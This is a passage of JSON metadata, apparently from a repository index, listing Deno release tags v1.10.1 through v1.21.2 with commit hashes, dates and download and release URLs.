kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1